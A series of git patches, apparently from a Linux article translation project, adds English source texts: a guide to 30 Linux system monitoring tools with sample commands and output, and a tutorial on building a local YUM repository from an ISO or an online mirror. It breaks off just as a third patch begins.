From b7964dfc4e2a65ab2fb4180124149dedcc25dce6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 13:00:08 +0800
Subject: [PATCH 162/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2030=20Linux=20Syst?=
=?UTF-8?q?em=20Monitoring=20Tools=20Every=20SysAdmin=20Should=20Know?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...toring Tools Every SysAdmin Should Know.md | 555 ++++++++++++++++++
1 file changed, 555 insertions(+)
create mode 100644 sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
diff --git a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
new file mode 100644
index 0000000000..ec121398d0
--- /dev/null
+++ b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
@@ -0,0 +1,555 @@
+30 Linux System Monitoring Tools Every SysAdmin Should Know
+======
+
+Need to monitor Linux server performance? Try these built-in commands and a few add-on tools. Most distributions come with tons of Linux monitoring tools. These tools provide metrics which can be used to get information about system activities. You can use these tools to find the possible causes of a performance problem. The commands discussed below are some of the most fundamental commands when it comes to system analysis and debugging Linux server issues such as:
+
+ 1. Finding out system bottlenecks
+ 2. Disk (storage) bottlenecks
+ 3. CPU and memory bottlenecks
+ 4. Network bottleneck.
+
+
+### 1. top - Process activity monitoring command
+
+top command display Linux processes. It provides a dynamic real-time view of a running system i.e. actual process activity. By default, it displays the most CPU-intensive tasks running on the server and updates the list every five seconds.
+
+#### Commonly Used Hot Keys With top Linux monitoring tools
+
+Here is a list of useful hot keys:
+
+Hot KeyUsagetDisplays summary information off and on.mDisplays memory information off and on.ASorts the display by top consumers of various system resources. Useful for quick identification of performance-hungry tasks on a system.fEnters an interactive configuration screen for top. Helpful for setting up top for a specific task.oEnables you to interactively select the ordering within top.rIssues renice command.kIssues kill command.zTurn on or off color/mono
+
+[How do I Find Out Linux CPU Utilization?][1]
+
+### 2. vmstat - Virtual memory statistics
+
+The vmstat command reports information about processes, memory, paging, block IO, traps, and cpu activity.
+`# vmstat 3`
+Sample Outputs:
+```
+procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
+ r b swpd free buff cache si so bi bo in cs us sy id wa st
+ 0 0 0 2540988 522188 5130400 0 0 2 32 4 2 4 1 96 0 0
+ 1 0 0 2540988 522188 5130400 0 0 0 720 1199 665 1 0 99 0 0
+ 0 0 0 2540956 522188 5130400 0 0 0 0 1151 1569 4 1 95 0 0
+ 0 0 0 2540956 522188 5130500 0 0 0 6 1117 439 1 0 99 0 0
+ 0 0 0 2540940 522188 5130512 0 0 0 536 1189 932 1 0 98 0 0
+ 0 0 0 2538444 522188 5130588 0 0 0 0 1187 1417 4 1 96 0 0
+ 0 0 0 2490060 522188 5130640 0 0 0 18 1253 1123 5 1 94 0 0
+```
+
+#### Display Memory Utilization Slabinfo
+
+`# vmstat -m`
+
+#### Get Information About Active / Inactive Memory Pages
+
+`# vmstat -a`
+[How do I find out Linux Resource utilization to detect system bottlenecks?][2]
+
+### 3. w - Find out who is logged on and what they are doing
+
+[w command][3] displays information about the users currently on the machine, and their processes.
+```
+# w username
+# w vivek
+```
+Sample Outputs:
+```
+ 17:58:47 up 5 days, 20:28, 2 users, load average: 0.36, 0.26, 0.24
+USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+root pts/0 10.1.3.145 14:55 5.00s 0.04s 0.02s vim /etc/resolv.conf
+root pts/1 10.1.3.145 17:43 0.00s 0.03s 0.00s w
+```
+
+### 4. uptime - Tell how long the Linux system has been running
+
+uptime command can be used to see how long the server has been running. The current time, how long the system has been running, how many users are currently logged on, and the system load averages for the past 1, 5, and 15 minutes.
+`# uptime`
+Output:
+```
+ 18:02:41 up 41 days, 23:42, 1 user, load average: 0.00, 0.00, 0.00
+```
+
+1 can be considered as optimal load value. The load can change from system to system. For a single CPU system 1 - 3 and SMP systems 6-10 load value might be acceptable.
+
+### 5. ps - Displays the Linux processes
+
+ps command will report a snapshot of the current processes. To select all processes use the -A or -e option:
+`# ps -A`
+Sample Outputs:
+```
+ PID TTY TIME CMD
+ 1 ? 00:00:02 init
+ 2 ? 00:00:02 migration/0
+ 3 ? 00:00:01 ksoftirqd/0
+ 4 ? 00:00:00 watchdog/0
+ 5 ? 00:00:00 migration/1
+ 6 ? 00:00:15 ksoftirqd/1
+....
+.....
+ 4881 ? 00:53:28 java
+ 4885 tty1 00:00:00 mingetty
+ 4886 tty2 00:00:00 mingetty
+ 4887 tty3 00:00:00 mingetty
+ 4888 tty4 00:00:00 mingetty
+ 4891 tty5 00:00:00 mingetty
+ 4892 tty6 00:00:00 mingetty
+ 4893 ttyS1 00:00:00 agetty
+12853 ? 00:00:00 cifsoplockd
+12854 ? 00:00:00 cifsdnotifyd
+14231 ? 00:10:34 lighttpd
+14232 ? 00:00:00 php-cgi
+54981 pts/0 00:00:00 vim
+55465 ? 00:00:00 php-cgi
+55546 ? 00:00:00 bind9-snmp-stat
+55704 pts/1 00:00:00 ps
+```
+
+ps is just like top but provides more information.
+
+#### Show Long Format Output
+
+`# ps -Al`
+To turn on extra full mode (it will show command line arguments passed to process):
+`# ps -AlF`
+
+#### Display Threads ( LWP and NLWP)
+
+`# ps -AlFH`
+
+#### Watch Threads After Processes
+
+`# ps -AlLm`
+
+#### Print All Process On The Server
+
+```
+# ps ax
+# ps axu
+```
+
+#### Want To Print A Process Tree?
+
+```
+# ps -ejH
+# ps axjf
+# [pstree][4]
+```
+
+#### Get Security Information of Linux Process
+
+```
+# ps -eo euser,ruser,suser,fuser,f,comm,label
+# ps axZ
+# ps -eM
+```
+
+#### Let Us Print Every Process Running As User Vivek
+
+```
+# ps -U vivek -u vivek u
+```
+
+#### Configure ps Command Output In a User-Defined Format
+
+```
+# ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:14,comm
+# ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm
+# ps -eopid,tt,user,fname,tmout,f,wchan
+```
+
+#### Try To Display Only The Process IDs of Lighttpd
+
+`# ps -C lighttpd -o pid=`
+OR
+`# pgrep lighttpd`
+OR
+`# pgrep -u vivek php-cgi`
+
+#### Print The Name of PID 55977
+
+`# ps -p 55977 -o comm=`
+
+#### Top 10 Memory Consuming Process
+
+```
+# ps -auxf | sort -nr -k 4 | head -10
+```
+
+#### Show Us Top 10 CPU Consuming Process
+
+`# ps -auxf | sort -nr -k 3 | head -10`
+
+[Show All Running Processes in Linux][5]
+
+### 6. free - Show Linux server memory usage
+
+free command shows the total amount of free and used physical and swap memory in the system, as well as the buffers used by the kernel.
+`# free `
+Sample Output:
+```
+ total used free shared buffers cached
+Mem: 12302896 9739664 2563232 0 523124 5154740
+-/+ buffers/cache: 4061800 8241096
+Swap: 1052248 0 1052248
+```
+
+### 7. iostat - Montor Linux average CPU load and disk activity
+
+iostat command report Central Processing Unit (CPU) statistics and input/output statistics for devices, partitions and network filesystems (NFS).
+`# iostat `
+Sample Outputs:
+```
+Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
+
+avg-cpu: %user %nice %system %iowait %steal %idle
+ 3.50 0.09 0.51 0.03 0.00 95.86
+
+Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn
+sda 22.04 31.88 512.03 16193351 260102868
+sda1 0.00 0.00 0.00 2166 180
+sda2 22.04 31.87 512.03 16189010 260102688
+sda3 0.00 0.00 0.00 1615 0
+```
+
+[Linux Track NFS Directory / Disk I/O Stats][6]
+
+### 8. sar - Monitor, collect and report Linux system activity
+
+sar command used to collect, report, and save system activity information. To see network counter, enter:
+`# sar -n DEV | more`
+The network counters from the 24th:
+`# sar -n DEV -f /var/log/sa/sa24 | more`
+You can also display real time usage using sar:
+`# sar 4 5`
+Sample Outputs:
+```
+Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
+
+06:45:12 PM CPU %user %nice %system %iowait %steal %idle
+06:45:16 PM all 2.00 0.00 0.22 0.00 0.00 97.78
+06:45:20 PM all 2.07 0.00 0.38 0.03 0.00 97.52
+06:45:24 PM all 0.94 0.00 0.28 0.00 0.00 98.78
+06:45:28 PM all 1.56 0.00 0.22 0.00 0.00 98.22
+06:45:32 PM all 3.53 0.00 0.25 0.03 0.00 96.19
+Average: all 2.02 0.00 0.27 0.01 0.00 97.70
+```
+
+### 9. mpstat - Monitor multiprocessor usage on Linux
+
+mpstat command displays activities for each available processor, processor 0 being the first one. mpstat -P ALL to display average CPU utilization per processor:
+`# mpstat -P ALL`
+Sample Output:
+```
+Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
+
+06:48:11 PM CPU %user %nice %sys %iowait %irq %soft %steal %idle intr/s
+06:48:11 PM all 3.50 0.09 0.34 0.03 0.01 0.17 0.00 95.86 1218.04
+06:48:11 PM 0 3.44 0.08 0.31 0.02 0.00 0.12 0.00 96.04 1000.31
+06:48:11 PM 1 3.10 0.08 0.32 0.09 0.02 0.11 0.00 96.28 34.93
+06:48:11 PM 2 4.16 0.11 0.36 0.02 0.00 0.11 0.00 95.25 0.00
+06:48:11 PM 3 3.77 0.11 0.38 0.03 0.01 0.24 0.00 95.46 44.80
+06:48:11 PM 4 2.96 0.07 0.29 0.04 0.02 0.10 0.00 96.52 25.91
+06:48:11 PM 5 3.26 0.08 0.28 0.03 0.01 0.10 0.00 96.23 14.98
+06:48:11 PM 6 4.00 0.10 0.34 0.01 0.00 0.13 0.00 95.42 3.75
+06:48:11 PM 7 3.30 0.11 0.39 0.03 0.01 0.46 0.00 95.69 76.89
+```
+
+[Linux display each multiple SMP CPU processors utilization individually][7].
+
+### 10. pmap - Montor process memory usage on Linux
+
+pmap command report memory map of a process. Use this command to find out causes of memory bottlenecks.
+`# pmap -d PID`
+To display process memory information for pid # 47394, enter:
+`# pmap -d 47394`
+Sample Outputs:
+```
+47394: /usr/bin/php-cgi
+Address Kbytes Mode Offset Device Mapping
+0000000000400000 2584 r-x-- 0000000000000000 008:00002 php-cgi
+0000000000886000 140 rw--- 0000000000286000 008:00002 php-cgi
+00000000008a9000 52 rw--- 00000000008a9000 000:00000 [ anon ]
+0000000000aa8000 76 rw--- 00000000002a8000 008:00002 php-cgi
+000000000f678000 1980 rw--- 000000000f678000 000:00000 [ anon ]
+000000314a600000 112 r-x-- 0000000000000000 008:00002 ld-2.5.so
+000000314a81b000 4 r---- 000000000001b000 008:00002 ld-2.5.so
+000000314a81c000 4 rw--- 000000000001c000 008:00002 ld-2.5.so
+000000314aa00000 1328 r-x-- 0000000000000000 008:00002 libc-2.5.so
+000000314ab4c000 2048 ----- 000000000014c000 008:00002 libc-2.5.so
+.....
+......
+..
+00002af8d48fd000 4 rw--- 0000000000006000 008:00002 xsl.so
+00002af8d490c000 40 r-x-- 0000000000000000 008:00002 libnss_files-2.5.so
+00002af8d4916000 2044 ----- 000000000000a000 008:00002 libnss_files-2.5.so
+00002af8d4b15000 4 r---- 0000000000009000 008:00002 libnss_files-2.5.so
+00002af8d4b16000 4 rw--- 000000000000a000 008:00002 libnss_files-2.5.so
+00002af8d4b17000 768000 rw-s- 0000000000000000 000:00009 zero (deleted)
+00007fffc95fe000 84 rw--- 00007ffffffea000 000:00000 [ stack ]
+ffffffffff600000 8192 ----- 0000000000000000 000:00000 [ anon ]
+mapped: 933712K writeable/private: 4304K shared: 768000K
+```
+
+The last line is very important:
+
+ * **mapped: 933712K** total amount of memory mapped to files
+ * **writeable/private: 4304K** the amount of private address space
+ * **shared: 768000K** the amount of address space this process is sharing with others
+
+
+
+[Linux find the memory used by a program / process using pmap command][8]
+
+### 11. netstat - Linux network and statistics monitoring tool
+
+netstat command displays network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
+```
+# netstat -tulpn
+# netstat -nat
+```
+
+### 12. ss - Network Statistics
+
+ss command use to dump socket statistics. It allows showing information similar to netstat. Please note that the netstat is mostly obsolete. Hence you need to use ss command. To ss all TCP and UDP sockets on Linux:
+`# ss -t -a`
+OR
+`# ss -u -a `
+Show all TCP sockets with process SELinux security contexts:
+`# ss -t -a -Z `
+See the following resources about ss and netstat commands:
+
+### 13. iptraf - Get real-time network statistics on Linux
+
+iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others. It can provide the following info in easy to read format:
+
+ * Network traffic statistics by TCP connection
+ * IP traffic statistics by network interface
+ * Network traffic statistics by protocol
+ * Network traffic statistics by TCP/UDP port and by packet size
+ * Network traffic statistics by Layer2 address
+
+![Fig.02: General interface statistics: IP traffic statistics by network interface ][9]
+
+![Fig.03 Network traffic statistics by TCP connection][10]
+
+[Install IPTraf on a Centos / RHEL / Fedora Linux To Get Network Statistics][11]
+
+### 14. tcpdump - Detailed network traffic analysis
+
+tcpdump command is simple command that dump traffic on a network. However, you need good understanding of TCP/IP protocol to utilize this tool. For.e.g to display traffic info about DNS, enter:
+`# tcpdump -i eth1 'udp port 53'`
+View all IPv4 HTTP packets to and from port 80, i.e. print only packets that contain data, not, for example, SYN and FIN packets and ACK-only packets, enter:
+`# tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'`
+Show all FTP session to 202.54.1.5, enter:
+`# tcpdump -i eth1 'dst 202.54.1.5 and (port 21 or 20'`
+Print all HTTP session to 192.168.1.5:
+`# tcpdump -ni eth0 'dst 192.168.1.5 and tcp and port http'`
+Use [wireshark to view detailed][12] information about files, enter:
+`# tcpdump -n -i eth1 -s 0 -w output.txt src or dst port 80`
+
+### 15. iotop - Linux I/O monitor
+
+iotop command monitor, I/O usage information, using the Linux kernel. It shows a table of current I/O usage sorted by processes or threads on the server.
+`$ sudo iotop`
+Sample outputs:
+![iotop monitoring linux disk read write IO][13]
+
+[Linux iotop: Check What's Stressing And Increasing Load On Your Hard Disks][14]
+
+### 16. htop - interactive process viewer
+
+htop is a free and open source ncurses-based process viewer for Linux. It is much better than top command. Very easy to use. You can select processes for killing or renicing without using their PIDs or leaving htop interface.
+`$ htop`
+Sample outputs:
+
+![htop process viewer for Linux][15]
+
+### 17. atop - Advanced Linux system & process monitor
+
+atop is a very powerful and an interactive monitor to view the load on a Linux system. It displays the most critical hardware resources from a performance point of view. You can quickly see CPU, memory, disk and network performance. It shows which processes are responsible for the indicated load concerning CPU and memory load on a process level.
+`$ atop`
+![atop Command Line Tools to Monitor Linux Performance][16]
+
+### 18. ac and lastcomm -
+
+You must monitor process and login activity on your Linux server. The psacct or acct package contains several utilities for monitoring process activities, including:
+
+ 1. ac command : Show statistics about users' connect time
+ 2. [lastcomm command][17] : Show info about about previously executed commands
+ 3. accton command : Turns process accounting on or off
+ 4. sa command : Summarizes accounting information
+
+
+
+[How to keep a detailed audit trail of what's being done on your Linux systems][18]
+
+### 19. monit - Process supervision
+
+Monit is a free and open source software that acts as process supervision. It comes with the ability to restart services which have failed. You can use Systemd, daemontools or any other such tool for the same purpose. [This tutorial shows how to install and configure monit as Process supervision on Debian or Ubuntu Linux][19].
+
+### 20. nethogs- Find out PIDs that using most bandwidth on Linux
+
+NetHogs is a small but handy net top tool. It groups bandwidth by process name such as Firefox, wget and so on. If there is a sudden burst of network traffic, start NetHogs. You will see which PID is causing bandwidth surge.
+`$ sudo nethogs`
+![nethogs linux monitoring tools open source][20]
+
+[Linux: See Bandwidth Usage Per Process With Nethogs Tool][21]
+
+### 21. iftop - Show bandwidth usage on an interface by host
+
+iftop command listens to network traffic on a given interface name such as eth0. [It displays a table of current bandwidth usage by pairs of host][22]s.
+`$ sudo iftop`
+![iftop in action][23]
+
+### 22. vnstat - A console-based network traffic monitor
+
+vnstat is easy to use console-based network traffic monitor for Linux. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
+`$ vnstat `
+![vnstat linux network traffic monitor][25]
+
+### 23. nmon - Linux systems administrator, tuner, benchmark tool
+
+nmon is a Linux sysadmin's ultimate tool for the tunning purpose. It can show CPU, memory, network, disks, file systems, NFS, top process resources and partition information from the cli.
+`$ nmon`
+![nmon command][26]
+
+[Install and Use nmon Tool To Monitor Linux Systems Performance][27]
+
+### 24. glances - Keep an eye on Linux system
+
+glances is an open source cross-platform monitoring tool. It provides tons of information on the small screen. It can also work in client/server mode.
+`$ glances`
+![Glances][28]
+
+[Linux: Keep An Eye On Your System With Glances Monitor][29]
+
+### 25. strace - Monitor system calls on Linux
+
+Want to trace Linux system calls and signals? Try strace command. This is useful for debugging webserver and other server problems. See how to use to [trace the process and][30] see What it is doing.
+
+### 26. /proc/ file system - Various Linux kernel statistics
+
+/proc file system provides detailed information about various hardware devices and other Linux kernel information. See [Linux kernel /proc][31] documentations for further details. Common /proc examples:
+```
+# cat /proc/cpuinfo
+# cat /proc/meminfo
+# cat /proc/zoneinfo
+# cat /proc/mounts
+```
+
+### 27. Nagios - Linux server/network monitoring
+
+[Nagios][32] is a popular open source computer system and network monitoring application software. You can easily monitor all your hosts, network equipment and services. It can send alert when things go wrong and again when they get better. [FAN is][33] "Fully Automated Nagios". FAN goals are to provide a Nagios installation including most tools provided by the Nagios Community. FAN provides a CDRom image in the standard ISO format, making it easy to easilly install a Nagios server. Added to this, a wide bunch of tools are including to the distribution, in order to improve the user experience around Nagios.
+
+### 28. Cacti - Web-based Linux monitoring tool
+
+Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality. Cacti provides a fast poller, advanced graph templating, multiple data acquisition methods, and user management features out of the box. All of this is wrapped in an intuitive, easy to use interface that makes sense for LAN-sized installations up to complex networks with hundreds of devices. It can provide data about network, CPU, memory, logged in users, Apache, DNS servers and much more. See how [to install and configure Cacti network graphing][34] tool under CentOS / RHEL.
+
+### 29. KDE System Guard - Real-time Linux systems reporting and graphing
+
+KSysguard is a network enabled task and system monitor application for KDE desktop. This tool can be run over ssh session. It provides lots of features such as a client/server architecture that enables monitoring of local and remote hosts. The graphical front end uses so-called sensors to retrieve the information it displays. A sensor can return simple values or more complex information like tables. For each type of information, one or more displays are provided. Displays are organized in worksheets that can be saved and loaded independently from each other. So, KSysguard is not only a simple task manager but also a very powerful tool to control large server farms.
+
+![Fig.05 KDE System Guard][35]
+
+See [the KSysguard handbook][36] for detailed usage.
+
+### 30. Gnome Linux system monitor
+
+The System Monitor application enables you to display basic system information and monitor system processes, usage of system resources, and file systems. You can also use System Monitor to modify the behavior of your system. Although not as powerful as the KDE System Guard, it provides the basic information which may be useful for new users:
+
+ * Displays various basic information about the computer's hardware and software.
+ * Linux Kernel version
+ * GNOME version
+ * Hardware
+ * Installed memory
+ * Processors and speeds
+ * System Status
+ * Currently available disk space
+ * Processes
+ * Memory and swap space
+ * Network usage
+ * File Systems
+ * Lists all mounted filesystems along with basic information about each.
+
+![Fig.06 The Gnome System Monitor application][37]
+
+### Bonus: Additional Tools
+
+A few more tools:
+
+ * [nmap][38] - scan your server for open ports.
+ * [lsof][39] - list open files, network connections and much more.
+ * [ntop][40] web based tool - ntop is the best tool to see network usage in a way similar to what top command does for processes i.e. it is network traffic monitoring software. You can see network status, protocol wise distribution of traffic for UDP, TCP, DNS, HTTP and other protocols.
+ * [Conky][41] - Another good monitoring tool for the X Window System. It is highly configurable and is able to monitor many system variables including the status of the CPU, memory, swap space, disk storage, temperatures, processes, network interfaces, battery power, system messages, e-mail inboxes etc.
+ * [GKrellM][42] - It can be used to monitor the status of CPUs, main memory, hard disks, network interfaces, local and remote mailboxes, and many other things.
+ * [mtr][43] - mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool.
+ * [vtop][44] - graphical terminal activity monitor on Linux
+
+
+
+Did I miss something? Please add your favorite system motoring tool in the comments.
+
+#### about the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][45], [Facebook][46], [Google+][47].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/top-linux-monitoring-tools.html
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
+[2]:https://www.cyberciti.biz/tips/linux-resource-utilization-to-detect-system-bottlenecks.html
+[3]:https://www.cyberciti.biz/faq/unix-linux-w-command-examples-syntax-usage-2/ (See Linux/Unix w command examples for more info)
+[4]:https://www.cyberciti.biz/faq/unix-linux-pstree-command-examples-shows-running-processestree/
+[5]:https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
+[6]:https://www.cyberciti.biz/faq/howto-linux-track-nfs-client-disk-metrics/
+[7]:https://www.cyberciti.biz/faq/linux-mpstat-command-report-processors-related-statistics/
+[8]:https://www.cyberciti.biz/tips/howto-find-memory-used-by-program.html
+[9]:https://www.cyberciti.biz/media/new/tips/2009/06/iptraf3.png (Fig.02: General interface statistics: IP traffic statistics by network interface )
+[10]:https://www.cyberciti.biz/media/new/tips/2009/06/iptraf2.png (Fig.03 Network traffic statistics by TCP connection)
+[11]:https://www.cyberciti.biz/faq/install-iptraf-centos-redhat-fedora-linux/
+[12]:https://www.cyberciti.biz/faq/linux-unix-bsd-apache-tcpdump-http-packets-sniffing/
+[13]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/iotop-monitoring-linux-disk-read-write-IO.jpg
+[14]:https://www.cyberciti.biz/hardware/linux-iotop-simple-top-like-io-monitor/
+[15]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/htop-process-viewer-for-Linux.jpg
+[16]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/atop-Command-Line-Tools-to-Monitor-Linux-Performance.jpg
+[17]:https://www.cyberciti.biz/faq/linux-unix-lastcomm-command-examples-usage-syntax/ (See Linux/Unix lastcomm command examples for more info)
+[18]:https://www.cyberciti.biz/tips/howto-log-user-activity-using-process-accounting.html
+[19]:https://www.cyberciti.biz/faq/how-to-install-and-use-monit-on-ubuntudebian-linux-server/
+[20]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/nethogs-linux-monitoring-tools-open-source.jpg
+[21]:https://www.cyberciti.biz/faq/linux-find-out-what-process-is-using-bandwidth/
+[22]:https://www.cyberciti.biz/tips/linux-display-bandwidth-usage-on-network-interface-by-host.html
+[23]:https://www.cyberciti.biz/media/new/images/faq/2013/11/iftop-outputs-small.gif
+[24]:https://www.cyberciti.biz/faq/centos-fedora-redhat-install-iftop-bandwidth-monitoring-tool/
+[25]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/vnstat-linux-network-traffic-monitor.jpg
+[26]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/nmon-command.jpg
+[27]:https://www.cyberciti.biz/faq/nmon-performance-analyzer-linux-server-tool/
+[28]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/glances-keep-an-eye-on-linux.jpg
+[29]:https://www.cyberciti.biz/faq/linux-install-glances-monitoring-tool/
+[30]:https://www.cyberciti.biz/tips/linux-strace-command-examples.html
+[31]:https://www.cyberciti.biz/files/linux-kernel/Documentation/filesystems/proc.txt
+[32]:http://www.nagios.org/
+[33]:http://fannagioscd.sourceforge.net/drupal/
+[34]:https://www.cyberciti.biz/faq/fedora-rhel-install-cacti-monitoring-rrd-software/
+[35]:https://www.cyberciti.biz/media/new/tips/2009/06/kde-systemguard-screenshot.png (Fig.05 KDE System Guard KDE task manager and performance monitor.)
+[36]:https://docs.kde.org/stable5/en/kde-workspace/ksysguard/index.html
+[37]:https://www.cyberciti.biz/media/new/tips/2009/06/gnome-system-monitor.png (Fig.06 The Gnome System Monitor application)
+[38]:https://www.cyberciti.biz/tips/linux-scanning-network-for-open-ports.html
+[39]:https://www.cyberciti.biz/tips/tag/lsof-command
+[40]:https://www.cyberciti.biz/faq/debian-ubuntu-install-ntop-network-traffic-monitoring-software/ (Debian / Ubuntu Linux Install ntop To See Network Usage / Network Status)
+[41]:https://github.com/brndnmtthws/conky
+[42]:http://gkrellm.srcbox.net/
+[43]:https://www.cyberciti.biz/tips/finding-out-a-bad-or-simply-overloaded-network-link-with-linuxunix-oses.html
+[44]:https://www.cyberciti.biz/faq/how-to-install-and-use-vtop-graphical-terminal-activity-monitor-on-linux/
+[45]:https://twitter.com/nixcraft
+[46]:https://facebook.com/nixcraft
+[47]:https://plus.google.com/+CybercitiBiz
From 140c1240624812160ca6917e3983dfdc711d1e00 Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 13:06:58 +0800
Subject: [PATCH 163/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Creating=20a=20YU?=
=?UTF-8?q?M=20repository=20from=20ISO=20&=20Online=20repo?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...a YUM repository from ISO - Online repo.md | 116 ++++++++++++++++++
1 file changed, 116 insertions(+)
create mode 100644 sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md
diff --git a/sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md b/sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md
new file mode 100644
index 0000000000..cd21bb951a
--- /dev/null
+++ b/sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md
@@ -0,0 +1,116 @@
+Creating a YUM repository from ISO & Online repo
+======
+
+YUM tool is one of the most important tool for Centos/RHEL/Fedora. Though in latest builds of fedora, it has been replaced with DNF but that not at all means that it has ran its course. It is still used widely for installing rpm packages, we have already discussed YUM with examples in our earlier tutorial ([ **READ HERE**][1]).
+
+In this tutorial, we are going to learn to create a Local YUM repository, first by using ISO image of OS & then by creating a mirror image of an online yum repository.
+
+### Creating YUM with DVD ISO
+
+We are using a Centos 7 dvd for this tutorial & same process should work on RHEL 7 as well.
+
+Firstly create a directory named YUM in root folder
+
+```
+$ mkdir /YUM-
+```
+
+then mount Centos 7 ISO ,
+
+```
+$ mount -t iso9660 -o loop /home/dan/Centos-7-x86_x64-DVD.iso /mnt/iso/
+```
+
+Next, copy the packages from mounted ISO to /YUM folder. Once all the packages have been copied to the system, we will install the required packages for creating YUM. Open /YUM & install the following RPM packages,
+
+```
+$ rpm -ivh deltarpm
+$ rpm -ivh python-deltarpm
+$ rpm -ivh createrepo
+```
+
+Once these packages have been installed, we will create a file named " **local.repo "** in **/etc/yum.repos.d** folder with all the yum information
+
+```
+$ vi /etc/yum.repos.d/local.repo
+```
+
+```
+LOCAL REPO]
+Name=Local YUM
+baseurl=file:///YUM
+gpgcheck=0
+enabled=1
+```
+
+Save & exit the file. Next we will create repo-data by running the following command
+
+```
+$ createrepo -v /YUM
+```
+
+It will take some time to create the repo data. Once the process finishes, run
+
+```
+$ yum clean all
+```
+
+to clean cache & then run
+
+```
+$ yum repolist
+```
+
+to check the list of all repositories. You should see repo "local.repo" in the list.
+
+
+### Creating mirror YUM repository with online repository
+
+Process involved in creating a yum is similar to creating a yum with an ISO image with one exception that we will fetch our rpm packages from an online repository instead of an ISO.
+
+Firstly, we need to find an online repository to get the latest packages . It is advised to find an online yum that is closest to your location , in order to optimize the download speeds. We will be using below mentioned , you can select one nearest to yours location from [CENTOS MIRROR LIST][2]
+
+After selecting a mirror, we will sync that mirror with our system using rsync but before you do that, make sure that you plenty of space on your server
+
+```
+$ rsync -avz rsync://mirror.fibergrid.in/centos/7.2/os/x86_64/Packages/s/ /YUM
+```
+
+Sync will take quite a while (maybe an hour) depending on your internet speed. After the syncing is completed, we will update our repo-data
+
+```
+$ createrepo - v /YUM
+```
+
+Our Yum is now ready to used . We can create a cron job for our repo to be updated automatically at a determined time daily or weekly as per you needs.
+
+To create a cron job for syncing the repository, run
+
+```
+$ crontab -e
+```
+
+& add the following line
+
+```
+30 12 * * * rsync -avz http://mirror.centos.org/centos/7/os/x86_64/Packages/ /YUM
+```
+
+This will enable the syncing of yum every night at 12:30 AM. Also remember to create repository configuration file in /etc/yum.repos.d , as we did above.
+
+That's it guys, you now have your own yum repository to use. Please share this article if you like it & leave your comments/queries in the comment box down below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/using-yum-command-examples/
+[2]:http://mirror.centos.org/centos/
From a1037e3790066308aa43533506797f2a71972551 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 13:10:45 +0800
Subject: [PATCH 164/371] =?UTF-8?q?20180108-3=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...el design flaw forcing numerous patches.md | 99 +++++++++++++++++++
1 file changed, 99 insertions(+)
create mode 100644 sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md
diff --git a/sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md b/sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md
new file mode 100644
index 0000000000..f8d1c49aa0
